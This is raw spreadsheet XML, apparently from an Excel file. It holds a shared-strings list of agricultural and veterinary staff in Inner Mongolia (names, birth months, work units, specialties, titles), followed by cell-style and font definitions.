    <t>养殖技术\动物防疫</t>
  </si>
  <si>
    <t>赤峰市宁城县汐子镇动物卫生监督站</t>
  </si>
  <si>
    <t>张素娟</t>
  </si>
  <si>
    <t>1973/11</t>
  </si>
  <si>
    <t>动物防疫检疫</t>
  </si>
  <si>
    <t>赤峰市敖汉旗驻玛尼罕乡动物卫生监督站</t>
  </si>
  <si>
    <t>姜丽新</t>
  </si>
  <si>
    <t>1973/06</t>
  </si>
  <si>
    <t>赤峰市敖汉旗驻贝子府镇动物卫生监督站</t>
  </si>
  <si>
    <t>张福春</t>
  </si>
  <si>
    <t>赤峰市敖汉旗畜牧业局家畜改良工作站</t>
  </si>
  <si>
    <t>尚才</t>
  </si>
  <si>
    <t>1973/12</t>
  </si>
  <si>
    <t>苗玉华</t>
  </si>
  <si>
    <t>曲国辉</t>
  </si>
  <si>
    <t>松山区穆家营子动防站</t>
  </si>
  <si>
    <t>赵振轩</t>
  </si>
  <si>
    <t>1973/8</t>
  </si>
  <si>
    <t>松山区农牧业局</t>
  </si>
  <si>
    <t>李树东</t>
  </si>
  <si>
    <t>1965/3</t>
  </si>
  <si>
    <t>赤峰市草原工作站</t>
  </si>
  <si>
    <t>崔凯</t>
  </si>
  <si>
    <t>1974/09</t>
  </si>
  <si>
    <t>张建英</t>
  </si>
  <si>
    <t>1966/01</t>
  </si>
  <si>
    <t>赤峰市农牧业综合行政执法支队</t>
  </si>
  <si>
    <t>李文华</t>
  </si>
  <si>
    <t>赤峰市右旗家畜改良站</t>
  </si>
  <si>
    <t>巴达荣贵</t>
  </si>
  <si>
    <t>1976/02</t>
  </si>
  <si>
    <t>接彩虹</t>
  </si>
  <si>
    <t>赤峰市元宝山区美丽河镇经济综合服务中心</t>
  </si>
  <si>
    <t>刘秀华</t>
  </si>
  <si>
    <t>赤峰市林西县农牧业局家畜改良站</t>
  </si>
  <si>
    <t>杨良晨</t>
  </si>
  <si>
    <t>1963/06</t>
  </si>
  <si>
    <t>敖汉旗饲料工作办公室</t>
  </si>
  <si>
    <t>王亚惠</t>
  </si>
  <si>
    <t>1962/10</t>
  </si>
  <si>
    <t>元宝山镇人民政府经济综合服务中心</t>
  </si>
  <si>
    <t>姜永金</t>
  </si>
  <si>
    <t>赤峰市宁城县三座店乡政府</t>
  </si>
  <si>
    <t>杨瑞琴</t>
  </si>
  <si>
    <t>1969/04</t>
  </si>
  <si>
    <t>畜牧技术推广</t>
  </si>
  <si>
    <t>赤峰市宁城县汐子政府农牧业中心</t>
  </si>
  <si>
    <t>郭亚利</t>
  </si>
  <si>
    <t>1971/12</t>
  </si>
  <si>
    <t>赤峰市敖汉旗驻长胜镇动物卫生监督站</t>
  </si>
  <si>
    <t>穆国春</t>
  </si>
  <si>
    <t>赤峰市兽药监察所</t>
  </si>
  <si>
    <t>于江</t>
  </si>
  <si>
    <t>兽药</t>
  </si>
  <si>
    <t>赤峰市敖汉旗新惠镇畜牧兽医工作站</t>
  </si>
  <si>
    <t>刘建华</t>
  </si>
  <si>
    <t>1971/08</t>
  </si>
  <si>
    <t>赤峰市右旗大板镇动物监督站</t>
  </si>
  <si>
    <t>乌兰格日乐</t>
  </si>
  <si>
    <t>赤峰市右旗巴彦他拉动物监督站</t>
  </si>
  <si>
    <t>斯钦巴特尔</t>
  </si>
  <si>
    <t>阿拉坦都拉嘎</t>
  </si>
  <si>
    <t>1969/06</t>
  </si>
  <si>
    <t>赤峰市右旗动物预防中心</t>
  </si>
  <si>
    <t>李岩</t>
  </si>
  <si>
    <t>赤峰市林西县林西镇动物卫生监督站</t>
  </si>
  <si>
    <t>李淑芬</t>
  </si>
  <si>
    <t>动物防检疫</t>
  </si>
  <si>
    <t>赤峰阿旗疫控中心</t>
  </si>
  <si>
    <t>特木尔</t>
  </si>
  <si>
    <t>1963/05</t>
  </si>
  <si>
    <t>图亚</t>
  </si>
  <si>
    <t>1968/03</t>
  </si>
  <si>
    <t>草都</t>
  </si>
  <si>
    <t>1969/07</t>
  </si>
  <si>
    <t>赤峰阿旗巴彦花动物卫监站</t>
  </si>
  <si>
    <t>葡萄</t>
  </si>
  <si>
    <t>1968/05</t>
  </si>
  <si>
    <t>赤峰阿旗罕苏木动物卫监站</t>
  </si>
  <si>
    <t>萨仁格日乐</t>
  </si>
  <si>
    <t>1968/09</t>
  </si>
  <si>
    <t>道尔吉</t>
  </si>
  <si>
    <t>1970/01</t>
  </si>
  <si>
    <t>赤峰阿旗绍根动物卫监站</t>
  </si>
  <si>
    <t>柒拾壹</t>
  </si>
  <si>
    <t>敖敦呼</t>
  </si>
  <si>
    <t>双金龙</t>
  </si>
  <si>
    <t>娜仁高娃</t>
  </si>
  <si>
    <t>阿其拉图</t>
  </si>
  <si>
    <t>1969/02</t>
  </si>
  <si>
    <t>赤峰阿旗动物卫监所</t>
  </si>
  <si>
    <t>徐海杉</t>
  </si>
  <si>
    <t>1956/05</t>
  </si>
  <si>
    <t>哈日巴拉</t>
  </si>
  <si>
    <t>赤峰阿旗天山镇动物卫监站</t>
  </si>
  <si>
    <t>孙兴国</t>
  </si>
  <si>
    <t>1956/06</t>
  </si>
  <si>
    <t>哈斯格日乐</t>
  </si>
  <si>
    <t>1965/08</t>
  </si>
  <si>
    <t>斯琴格日勒</t>
  </si>
  <si>
    <t>赤峰阿旗巴拉奇如德动物卫监站</t>
  </si>
  <si>
    <t>图雅</t>
  </si>
  <si>
    <t>哈斯其木格</t>
  </si>
  <si>
    <t>赤峰阿旗赛罕塔拉动物卫监站</t>
  </si>
  <si>
    <t>哈斯同拉嘎</t>
  </si>
  <si>
    <t>萨其格玛</t>
  </si>
  <si>
    <t>1968/07</t>
  </si>
  <si>
    <t>赤峰阿旗坤都动物卫监站</t>
  </si>
  <si>
    <t>浩斯巴雅尔</t>
  </si>
  <si>
    <t>花拉</t>
  </si>
  <si>
    <t>松山区夏家店乡</t>
  </si>
  <si>
    <t>申庆云</t>
  </si>
  <si>
    <t>1966/3</t>
  </si>
  <si>
    <t>锡盟畜牧工作站</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>赵保忠</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>石晓华</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>巴市农科院</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>畜牧</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>胡兴国</t>
  </si>
  <si>
    <t>1975/10</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>大豆玉种</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>许贞淑</t>
  </si>
  <si>
    <t>1964/04</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>徐长海</t>
  </si>
  <si>
    <t>1956/01</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>玉种科研</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>呼伦贝尔市农业种子管理站</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>曲淑萍</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>1960/10</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>农业种子管理</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>呼伦贝尔市额尔古纳市农业技术推广中心</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>王清</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>1968/10</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>兴安盟农业科学研究所</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>王崴</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>1963/10</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>农业科研</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>副研究员</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>兴安盟前旗农业技术推广中心</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>佟士斌</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>农技推广</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>兴安盟中旗农牧业局农业技术推广站</t>
  </si>
  <si>
    <t>冯建军</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>1976/01</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>兴安盟中旗种子管理站</t>
  </si>
  <si>
    <t>张玉珠</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>1976/09</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>兴安盟突泉县宝石镇农林牧水服务中心</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>梁  华</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">1972/11      </t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>兴安盟扎旗音镇农牧林水服务中心</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>刘淑丽</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>1973/06</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>刘艳明</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>兴安盟乌市种子管理站</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>于丛华</t>
  </si>
  <si>
    <t>1962/06</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>兴安盟丰垦种业有限责任公司</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>纪勇</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>1965/11</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>种子选育</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>兴安盟扎旗鱼种站</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>岳中海</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>1967/01</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>水产技术推广</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>兴安盟突泉县渔政监督管理站</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>王晓晖</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">1966/11   </t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>水产养殖</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>兴安盟扎旗农牧业机械管理局</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>曹晶杰</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>女</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>1969/08</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>农机管理</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>高级工程师</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>通辽市农业科学研究院</t>
  </si>
  <si>
    <t>贾娟霞</t>
  </si>
  <si>
    <t>1979/10</t>
  </si>
  <si>
    <t>蓖麻研究</t>
  </si>
  <si>
    <t>通辽市扎鲁特旗农广校</t>
  </si>
  <si>
    <t>曹慧明</t>
  </si>
  <si>
    <t>1965/09</t>
  </si>
  <si>
    <t>农业技术 推广</t>
  </si>
  <si>
    <t>高级农艺师</t>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>通辽市科尔沁左翼中旗设施农业生产办公室</t>
  </si>
  <si>
    <t>杨凤仁</t>
  </si>
  <si>
    <t>李明丽</t>
  </si>
  <si>
    <t>1966/09</t>
  </si>
  <si>
    <t>庞辉</t>
  </si>
  <si>
    <t>1970/09</t>
  </si>
  <si>
    <t>通辽市科左后旗国有胜利农场</t>
  </si>
  <si>
    <t>冯文军</t>
  </si>
  <si>
    <t>通辽市科尔沁区木里图镇政府农业服务中心</t>
  </si>
  <si>
    <t>孙杰</t>
  </si>
  <si>
    <t>1972/12</t>
  </si>
  <si>
    <t>通辽市金山种业科技有限责任公司</t>
  </si>
  <si>
    <t>石小翠</t>
  </si>
  <si>
    <t>1976/06</t>
  </si>
  <si>
    <t>科研育种</t>
  </si>
  <si>
    <t>通辽市内蒙古中农种子科技有限公司</t>
  </si>
  <si>
    <t>刘海宇</t>
  </si>
  <si>
    <t>1975/11</t>
  </si>
  <si>
    <t>通辽市科尔沁区水产开发办公室</t>
  </si>
  <si>
    <t>兰永福</t>
  </si>
  <si>
    <t>1972/05</t>
  </si>
  <si>
    <t>水产养殖</t>
  </si>
  <si>
    <r>
      <t>高级</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>工程师</t>
    </r>
    <phoneticPr fontId="2" type="noConversion"/>
  </si>
  <si>
    <t>通辽市科尔沁区农机推广站</t>
  </si>
  <si>
    <t>邵德军</t>
  </si>
  <si>
    <t>农机技术  推广</t>
  </si>
  <si>
    <t>单玉杰</t>
  </si>
  <si>
    <t>白晓雷</t>
  </si>
  <si>
    <t>1982/02</t>
  </si>
  <si>
    <t>农业科研</t>
  </si>
  <si>
    <t>张  玮</t>
  </si>
  <si>
    <t>1981/01</t>
  </si>
  <si>
    <t>王燕春</t>
  </si>
  <si>
    <t>1980/01</t>
  </si>
  <si>
    <t>赤峰市翁旗农牧业局土壤肥料站</t>
  </si>
  <si>
    <t>周立业</t>
  </si>
  <si>
    <t>1957/11</t>
  </si>
  <si>
    <t>农业技术推广</t>
  </si>
  <si>
    <t>赤峰市翁旗农牧业局农业技术推广站</t>
  </si>
  <si>
    <t>戴素芬</t>
  </si>
  <si>
    <t>1963/09</t>
  </si>
  <si>
    <t>石磊</t>
  </si>
  <si>
    <t>宋长学</t>
  </si>
  <si>
    <t>赤峰市宁城县必斯营子乡政府农牧业综合服务中心</t>
  </si>
  <si>
    <t>王淑梅</t>
  </si>
  <si>
    <t>赤峰市宁城县大明镇农牧业综合服务中心</t>
  </si>
  <si>
    <t>韩庆山</t>
  </si>
  <si>
    <t>赤峰市宁城县农牧业局</t>
  </si>
  <si>
    <t>王志祥</t>
  </si>
  <si>
    <t>1957/12</t>
  </si>
  <si>
    <t>农业环保、农村能源</t>
  </si>
  <si>
    <t>赤峰市右旗农业站</t>
  </si>
  <si>
    <t>张艳龙</t>
  </si>
  <si>
    <t>1977/07</t>
  </si>
  <si>
    <t>松山区哈拉道口镇农业站</t>
  </si>
  <si>
    <t>苑国霞</t>
  </si>
  <si>
    <t>1974/9</t>
  </si>
  <si>
    <t>松山区大夫营子乡政府农业站</t>
  </si>
  <si>
    <t>方瑞春</t>
  </si>
  <si>
    <t>1973/03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</si>
</sst>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85" formatCode="yyyy\/mm"/>
    <numFmt numFmtId="186" formatCode="0.00_ "/>
    <numFmt numFmtId="187" formatCode="yyyy/mm"/>
    <numFmt numFmtId="188" formatCode="0.0000000E+00"/>
  </numFmts>
  <fonts count="15">
    <font>
      <sz val="12"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="12"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="9"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="11"/>
      <color indexed="8"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="10"/>
      <name val="Arial"/>
      <family val="2"/>
      <charset val="204"/>
    </font>
    <font>
      <sz val="12"/>
      <name val="仿宋_GB2312"/>
      <family val="3"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="20"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="10"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="10"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="10"/>
      <name val="Helv"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="12"/>
      <name val="Times New Roman"/>
      <family val="1"/>
    </font>
    <font>
      <sz val="10"/>
      <name val="Verdana"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="11"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="9"/>
      <name val="Times New Roman"/>
      <family val="1"/>
    </font>
    <font>
      <sz val="10"/>
      <color indexed="14"/>
      <name val="宋体"/>
      <charset val="13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s>
  <cellStyleXfs count="12">
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0"/>
    <xf numFmtId="0" fontId="9"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cellStyleXfs>
  <cellXfs count="138">
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="5"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49" fontId="5" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"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2" borderId="1" xfId="5" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="8" fillId="2" borderId="1" xfId="5" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="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88" fontId="7" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="0" borderId="0"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 fillId="0" borderId="0" xfId="4"/>
    <xf numFmtId="0" fontId="9" fillId="0" borderId="0" xfId="1"/>
    <xf numFmtId="49" fontId="1" fillId="0" borderId="0" xfId="4" applyNumberFormat="1"/>
    <xf numFmtId="49" fontId="10" fillId="0" borderId="0" xfId="4" applyNumberFormat="1" applyFont="1"/>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="0" xfId="0" applyFont="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="8" fillId="0" borderId="1" xfId="5" applyFont="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center" wrapText="1" shrinkToFit="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="8" fillId="0" borderId="1" xfId="5" applyFont="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="8" fillId="0" borderId="1" xfId="3" applyFont="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="8" fillId="0" borderId="0" xfId="0" applyFont="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="8" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="8" fillId="2" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="185" fontId="8" fillId="2" borderId="1" xfId="5" applyNumberFormat="1"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185" fontId="8" fillId="0" borderId="1" xfId="5" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="8" fillId="0" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="49" fontId="8"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vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="49" fontId="8" fillId="0" borderId="2" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment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1" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="8" fillId="0" borderId="0" xfId="0" applyFont="1"/>
    <xf numFmtId="49" fontId="8" fillId="0" borderId="1" xfId="6" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="49" fontId="8" fillId="0" borderId="1" xfId="6" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="8" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>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0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="49" fontId="4" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="0" xfId="0" applyFont="1"/>
    <xf numFmtId="0" fontId="8" fillId="0" borderId="0"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8" fillId="0" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1" shrinkToFit="1"/>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8" fillId="0" borderId="1" xfId="5" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center" wrapText="1" shrinkToFit="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="8" fillId="0" borderId="1" xfId="5" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="49" fontId="8" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="49"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shrinkToFit="1"/>
    </xf>
    <xf numFmtId="49" fontId="8" fillId="0" borderId="1" xfId="5" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="49" fontId="8" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="49" fontId="8" fillId="0" borderId="1" xfId="5"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18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0" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="0" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="8" fillId="0" borderId="0" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="185" fontId="8" fillId="0" borderId="1"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vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="12"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3" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="49" fontId="12" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="2" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="8" fillId="0" borderId="2"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4" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="8" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="49" fontId="8" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="49" fontId="8" fillId="2" borderId="1" xfId="5" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="8" fillId="2" borderId="1" xfId="3" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="49" fontId="8" fillId="2" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="8" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="49" fontId="8" fillId="0" borderId="1" xfId="5" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="49" fontId="8" fillId="0" borderId="1" xfId="5" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1" shrinkToFit="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="49" fontId="8" fillId="0" borderId="1" xfId="11" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="49" fontId="8" fillId="0" borderId="1" xfId="11" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="49" fontId="8" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="49" fontId="8" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="185" fontId="8" fillId="0" borderId="1" xfId="5" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="185" fontId="4" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="0" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="8" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="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8" fillId="0" borderId="0" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="0" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="187" fontId="8" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="49" fontId="8" fillId="0" borderId="2" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
